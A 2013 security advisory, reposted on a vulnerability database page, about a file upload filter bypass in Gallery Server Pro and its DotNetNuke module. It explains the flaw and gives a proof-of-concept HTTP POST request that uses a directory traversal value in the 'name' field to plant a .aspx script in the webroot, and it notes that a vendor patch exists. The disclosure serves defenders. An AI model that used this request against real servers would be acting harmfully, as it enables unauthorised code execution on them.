Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gallery Server Pro File Upload Filter Bypass

🗓️ 14 May 2013 00:00:00Reported by Drew CalcottType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 154 Views

Gallery Server Pro File Upload Filter Bypass. Vulnerable to bypassing file upload filter restrictions, allowing malicious users to upload arbitrary file types and execute server-side code. Requires authenticated account or configured unauthenticated upload permission

Code
` ( , ) (,  
. `.' ) ('. ',  
). , ('. ( ) (  
(_,) .`), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/ .-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_='`"``=.  
  
presents..  
  
  
Gallery Server Pro File Upload Filter Bypass  
  
Vendor Link: http://www.galleryserverpro.com/  
PDF:  
http://security-assessment.com/files/documents/advisory/GalleryServerProFileUploadFilterBypass.pdf  
  
  
+-----------+  
|Description|  
+-----------+  
  
Gallery Server Pro is a media gallery that works both as a stand-alone  
application and as a module for DotNetNuke. Security-Assessment.com has  
discovered that the upload functionality of both the application and  
DotNetNuke module are vulnerable to bypassing the restrictions present  
in the file upload filter. This permits a malicious authenticated user  
to upload arbitrary file types, including .NET scripts, allowing the  
execution of server side code.  
  
  
+------------+  
|Exploitation|  
+------------+  
  
Exploitation of this vulnerability requires the user to have an  
authenticated account with permission to upload files to a gallery, or  
for the application / module to be configured to allow unauthenticated  
users to upload. By modifying the content of the “name” parameter in the  
POST request to the server, it is possible to bypass the file type  
upload restrictions, which are only applied to the “filename” parameter.  
By then passing directory traversal strings in the “name” parameter, it  
is possible to save the uploaded file within the webroot of the  
application / module.  
  
In the standalone application version of Gallery Server Pro, the IIS  
user does not have permission to write directly to the webroot of the  
application. Therefore, it is necessary to place the file within the  
“gs\mediaobjects\Samples” path as per the example below. Please note  
that the DotNetNuke module does not have these same restrictions by default.  
  
  
+----------------------------------+  
|Proof of Concept HTTP POST Request|  
+----------------------------------+  
  
*********************************************************************  
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1  
Host: <vulnerablesite>  
Referer:  
http://<vulnerablesite>/gallery/default.aspx?g=task_addobjects&aid=2  
Content-Length: 73459  
Content-Type: multipart/form-data;  
boundary=---------------------------41184676334  
Cookie: <VALID COOKIE DATA>  
Pragma: no-cache  
Cache-Control: no-cache  
  
-----------------------------41184676334  
Content-Disposition: form-data; name="name"  
  
..\..\gs\mediaobjects\Samples\malicious.aspx  
-----------------------------41184676334  
Content-Disposition: form-data; name="file"; filename="malicious.jpg"  
Content-Type: application/octet-stream  
  
Malicious code here.  
  
-----------------------------41184676334--  
*********************************************************************  
  
The uploaded file will then be available on the affected server at:  
http://<vulnerablesite>/gallery/gs/mediaobjects/Samples/malicious.aspx  
  
  
+--------+  
|Solution|  
+--------+  
  
The vendor has released an update for all vulnerable versions of Gallery  
Server Pro and its related DotNetNuke  
plugin.  
The patch is available for download from the vendor’s website at:  
http://www.galleryserverpro.com/download.aspx  
  
  
+-----------------------------+  
|About Security-Assessment.com|  
+-----------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information  
Security consultants specialising in providing high quality Information  
Security services to clients throughout the Asia Pacific region. Our  
clients include some of the largest globally recognised companies in  
areas such as finance, telecommunications, broadcasting, legal and  
government. Our aim is to provide the very best independent advice and a  
high level of technical expertise while creating long and lasting  
professional relationships with our clients.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 May 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
gallery server profile uploadbypassvulnerablefilter restrictionsarbitrary file typesserver-side codeauthenticated accountunauthenticated upload permission
154